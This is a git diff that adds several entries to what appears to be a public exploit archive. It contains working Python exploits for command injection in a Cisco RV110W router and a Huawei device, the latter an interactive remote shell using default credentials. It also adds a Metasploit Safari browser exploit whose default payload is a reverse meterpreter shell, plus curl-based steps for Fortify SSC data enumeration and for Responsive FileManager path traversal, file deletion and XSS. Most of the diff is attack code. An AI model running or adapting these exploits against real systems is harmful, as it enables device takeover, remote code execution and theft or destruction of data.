diff --git a/exploits/hardware/remote/45986.py b/exploits/hardware/remote/45986.py
new file mode 100755
index 000000000..6ac872869
--- /dev/null
+++ b/exploits/hardware/remote/45986.py
@@ -0,0 +1,98 @@
+#!/usr/bin/env python2
+
+#####
+## Cisco RV110W Password Disclosure and OS Command Execute.
+### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
+
+# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
+# Date: 2018-08
+# Exploit Author: RySh
+# Vendor Homepage: https://www.cisco.com/
+# Version: 1.1.0.9
+# Tested on: RV110W 1.1.0.9
+# CVE : CVE-2014-0683, CVE-2015-6396
+
+import os
+import sys
+import re
+import urllib
+import urllib2
+import getopt
+import json
+
+import ssl
+
+ssl._create_default_https_context = ssl._create_unverified_context
+
+###
+# Usage: ./{script_name} 192.168.1.1 443 "reboot"
+###
+
+if __name__ == "__main__":
+ IP = argv[1]
+ PORT = argv[2]
+ CMD = argv[3]
+
+ # Get session key, Just access index page.
+ url = 'https://' + IP + ':' + PORT + '/'
+ req = urllib2.Request(url)
+ result = urllib2.urlopen(req)
+ res = result.read()
+
+ # parse 'admin_pwd'! -- Get credits
+ admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
+ admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
+ print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
+
+ # Get session_id by POST
+ req2 = urllib2.Request(url + "login.cgi")
+ req2.add_header('Origin', url)
+ req2.add_header('Upgrade-Insecure-Requests', 1)
+ req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
+ req2.add_header('User-Agent',
+ 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+ req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+ req2.add_header('Referer', url)
+ req2.add_header('Accept-Encoding', 'gzip, deflate')
+ req2.add_header('Accept-Language', 'en-US,en;q=0.9')
+ req2.add_header('Cookie', 'SessionID=')
+ data = {"submit_button": "login",
+ "submit_type": "",
+ "gui_action": "",
+ "wait_time": "0",
+ "change_action": "",
+ "enc": "1",
+ "user": admin_user,
+ "pwd": admin_pwd,
+ "sel_lang": "EN"
+ }
+ r = urllib2.urlopen(req2, urllib.urlencode(data))
+ resp = r.read()
+ login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
+ session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
+
+ # Execute your commands via diagnose command parameter, default command is `reboot`
+ req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
+ req3.add_header('Origin', url)
+ req3.add_header('Upgrade-Insecure-Requests', 1)
+ req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
+ req3.add_header('User-Agent',
+ 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+ req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+ req3.add_header('Referer', url)
+ req3.add_header('Accept-Encoding', 'gzip, deflate')
+ req3.add_header('Accept-Language', 'en-US,en;q=0.9')
+ req3.add_header('Cookie', 'SessionID=')
+ data_cmd = {"submit_button": "Diagnostics",
+ "change_action": "gozila_cgi",
+ "submit_type": "start_ping",
+ "gui_action": "",
+ "traceroute_ip": "",
+ "commit": "1",
+ "ping_times": "3 |" + CMD + "|",
+ "ping_size": "64",
+ "wait_time": "4",
+ "ping_ip": "127.0.0.1",
+ "lookup_name": ""
+ }
+ r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45991.py b/exploits/hardware/webapps/45991.py
new file mode 100755
index 000000000..18878c74d
--- /dev/null
+++ b/exploits/hardware/webapps/45991.py
@@ -0,0 +1,51 @@
+#!/bin/python
+'''
+ Author : Rebellion
+ Github : @rebe11ion
+ Twitter : @rebellion
+'''
+
+import urllib2,requests,os,sys
+from requests.auth import HTTPDigestAuth
+DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
+DEFAULT_TIMEOUT = 5
+def fetch_url(url):
+ global DEFAULT_HEADERS, DEFAULT_TIMEOUT
+ request = urllib2.Request(url, headers=DEFAULT_HEADERS)
+ data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
+ return data
+
+def exploit(ip, path):
+ url = "http://%s:37215/icon/../../../%s" % (ip, path)
+ data = fetch_url(url)
+ return data
+
+def main():
+ pwd = "/"
+ cmd_path = "/tmp/ccmd"
+ pwd_path = "/tmp/cpwd"
+ while True:
+ targetip = sys.argv[1]
+ cmd_ = raw_input("[{}]$ ".format(pwd))
+ cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
+ rm = "\n \n \n $(" + cmd + ")\n$(echo HUAWEIUPNP)\n\n \n "
+ url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
+ requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
+ assert cmd_path.startswith("/"), "An absolute path is required"
+ data = exploit(targetip, cmd_path)
+ open(cmd_path,"wb").write(data)
+ if "cd" in cmd_:
+ pass
+ elif "clear" in cmd_:
+ os.system("clear")
+ elif "cat" in cmd_:
+ os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
+ else:
+ if "|" in cmd_:
+ os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
+ else:
+ os.system("cat {}".format(cmd_path))
+ pwd = exploit(targetip,pwd_path).strip("\n")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/macos/remote/45998.rb b/exploits/macos/remote/45998.rb
new file mode 100755
index 000000000..80f916705
--- /dev/null
+++ b/exploits/macos/remote/45998.rb
@@ -0,0 +1,510 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Safari Proxy Object Type Confusion',
+ 'Description' => %q{
+ This module exploits a type confusion bug in the Javascript Proxy object in
+ WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+ it is possible to run arbitrary JS code during the execution of a CreateThis
+ operation. This makes it possible to change the structure of e.g. an argument
+ without causing a bailout, leading to a type confusion (CVE-2018-4233).
+
+ The JIT region is then replaced with shellcode which loads the second stage.
+ The second stage exploits a logic error in libxpc, which uses command execution
+ via the launchd's "spawn_via_launchd" API (CVE-2018-4404).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'saelo' ],
+ 'References' => [
+ ['CVE', '2018-4233'],
+ ['CVE', '2018-4404'],
+ ['URL', 'https://github.com/saelo/cve-2018-4233'],
+ ['URL', 'https://github.com/saelo/pwn2own2018'],
+ ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+ ],
+ 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
+ 'Platform' => 'osx',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
+ 'Targets' => [
+ [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+ [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+ ],
+ 'DisclosureDate' => 'Mar 15 2018'))
+ register_advanced_options([
+ OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
+ ])
+ end
+
+ def offset_table
+ {
+ '10.12.6' => {
+ :jsc_vtab => '0x0000d8d8',
+ :dyld_stub_loader => '0x00001168',
+ :dlopen => '0x000027f7',
+ :confstr => '0x00002c84',
+ :strlen => '0x00001b40',
+ :strlen_got => '0xdc0',
+ },
+ '10.13' => {
+ :jsc_vtab => '0x0000e5f8',
+ :dyld_stub_loader => '0x000012a8',
+ :dlopen => '0x00002e60',
+ :confstr => '0x000024fc',
+ :strlen => '0x00001440',
+ :strlen_got => '0xee8',
+ },
+ '10.13.3' => {
+ :jsc_vtab => '0xe5e8',
+ :dyld_stub_loader => '0x1278',
+ :dlopen => '0x2e30',
+ :confstr => '0x24dc',
+ :strlen => '0x1420',
+ :strlen_got => '0xee0',
+ },
+ }
+ end
+
+ def exploit_data(directory, file)
+ path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
+ ::File.binread path
+ end
+
+ def stage1_js
+ stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
+ "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
+ end
+
+ def stage2_js
+ stage2 = exploit_data "CVE-2018-4404", "stage2.dylib"
+ payload_cmd = payload.raw
+ if target['Arch'] == ARCH_PYTHON
+ payload_cmd = "echo \"#{payload_cmd}\" | python"
+ end
+ placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')
+ stage2[placeholder_index, payload_cmd.length] = payload_cmd
+ "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
+ end
+
+ def get_offsets(user_agent)
+ if user_agent =~ /Intel Mac OS X (.*?)\)/
+ version = $1.gsub("_", ".")
+ mac_osx_version = Gem::Version.new(version)
+ if mac_osx_version >= Gem::Version.new('10.13.4')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif mac_osx_version < Gem::Version.new('10.12')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif offset_table.key?(version)
+ offset = offset_table[version]
+ return <<-EOF
+const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
+const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
+const DLOPEN_OFFSET = #{offset[:dlopen]};
+const CONFSTR_OFFSET = #{offset[:confstr]};
+const STRLEN_OFFSET = #{offset[:strlen]};
+const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
+EOF
+ else
+ print_warning "No offsets for version #{mac_osx_version}"
+ end
+ else
+ print_warning "Unexpected User-Agent"
+ end
+ return false
+ end
+
+ def on_request_uri(cli, request)
+ user_agent = request['User-Agent']
+ print_status("Request from #{user_agent}")
+ offsets = get_offsets(user_agent)
+ unless offsets
+ send_not_found(cli)
+ return
+ end
+
+ utils = exploit_data "CVE-2018-4233", "utils.js"
+ int64 = exploit_data "CVE-2018-4233", "int64.js"
+ html = %Q^
+
+
+
+
+
+ ^
+ unless datastore['DEBUG_EXPLOIT']
+ html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '')
+ end
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/45989.txt b/exploits/multiple/webapps/45989.txt
new file mode 100644
index 000000000..522d643e2
--- /dev/null
+++ b/exploits/multiple/webapps/45989.txt
@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7690
+CVE: CVE-2018-7690
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's
+Fortify projects via GET method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users
+to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending GET is:
+
+GET /ssc/api/v1/projects/2 HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;
+
+Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see the following response project details:
+
+{
+ "createdBy": "admin",
+ "name": "Project Name Here",
+ "description": "",
+ "id": 2,
+ "creationDate": "2012-08-03T09:43:36.000+0000",
+ "issueTemplateId": null
+}
+
+Step (6): Now extract all the projects details registered into Fortify SSC server:
+
+Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see other project details available as following:
+
+{
+"createdBy": "alex",
+"name": "Project Name Here",
+"description": "",
+"id": 5,
+"creationDate": "2012-09-21T09:35:16.000+0000",
+"issueTemplateId": null
+}
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /ssc/api/v1/projects/§1§
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack...
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
diff --git a/exploits/multiple/webapps/45990.txt b/exploits/multiple/webapps/45990.txt
new file mode 100644
index 000000000..d619a39d1
--- /dev/null
+++ b/exploits/multiple/webapps/45990.txt
@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7691
+CVE: CVE-2018-7691
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users
+to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- Curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending POST is:
+
+POST /ssc/api/v1/bulk HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
+Content-Length: 123
+
+{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a
+
+Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'
+
+You should see the following response:
+
+200
+
+Step (6): Now extract all local and LDAP users registered into Fortify SSC server:
+
+Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'
+
+You should see the following response with users available
+
+"admin"
+"sca"
+"alex"
+
+[../snip]
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /api/v1/projectVersions/§1§/authEntities
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack…
+Have fun!
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
diff --git a/exploits/php/webapps/43593.py b/exploits/php/webapps/43593.txt
old mode 100755
new mode 100644
similarity index 100%
rename from exploits/php/webapps/43593.py
rename to exploits/php/webapps/43593.txt
diff --git a/exploits/php/webapps/45987.txt b/exploits/php/webapps/45987.txt
new file mode 100644
index 000000000..b79b82e16
--- /dev/null
+++ b/exploits/php/webapps/45987.txt
@@ -0,0 +1,99 @@
+Responsive FileManager 9.13.4 - Multiple Vulnerabilities
+
+Date:
+ December 12, 2018
+
+Author:
+ farisv
+
+Vendor Homepage:
+ https://www.responsivefilemanager.com/
+
+Vulnerable Package Link:
+ https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsive_filemanager.zip
+
+
+Responsive FileManager is a free open-source file manager and image manager made with the jQuery library, CSS3, PHP and HTML5 that offers a nice and elegant way to upload and insert files, images and videos.
+You can use it as external plugin for TinyMCE version 4.x (and older), CKEditor CLEditor, or you can also use it as a stand-alone file manager to manage and select files.
+
+The following are the vulnerabilities found before v 9.14.0.
+
+1. Arbitrary file read via path traversal with `path` parameter through `get_file` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text"
+%
+
+2. Arbitrary file read via path traversal with `path` parameter through `copy_cut` action in ajax_calls.php and `paste_clipboard` action in execute.php.
+
+# Copy/cut the file with directory traversal so the desired file path will be saved to the session.
+$ curl -X POST -d "sub_action=copy&path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=copy_cut"
+
+# Paste the clipboard
+$ curl -X POST -d "path=" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=paste_clipboard"
+
+# File is in the `upload_dir` folder or in the dialog page.
+$ curl http://localhost:1111/source/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+3. Arbitrary file write via path traversal mitigation bypass through `create_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file"
+$ ls /tmp
+hacked.txt
+
+4. Arbitrary file deletion via path traversal mitigation bypass through `delete_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/hacked.txt" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_file"
+
+5. Arbitrary directory deletion via path traversal mitigation bypass through `delete_folder` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../filemanager" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_folder"
+
+6. Arbitrary file write (only with jpg/jpeg/png extension) with `path` parameter through `save_img` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../tmp/&name=hacked.jpg&url=http://s3.amazonaws.com/feather-files-aviary-prod-us-east-1/2444282ef4344e3dacdedc7a78f8877d/2018-10-23/44f0f34961464feb92b53d953b02d4bb.jpg" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=save_img"
+$ ls /tmp
+hacked.jpg
+
+7. Persistent XSS in `media_preview` action.
+
+Upload a file with valid media extension (e.g. mp3) with XSS payload in the name. For example, "a\"%2balert(document.cookie)%2b\"".mp3 will trigger `alert(document.cookie)` when previewed.
\ No newline at end of file
diff --git a/exploits/php/webapps/45992.html b/exploits/php/webapps/45992.html
new file mode 100644
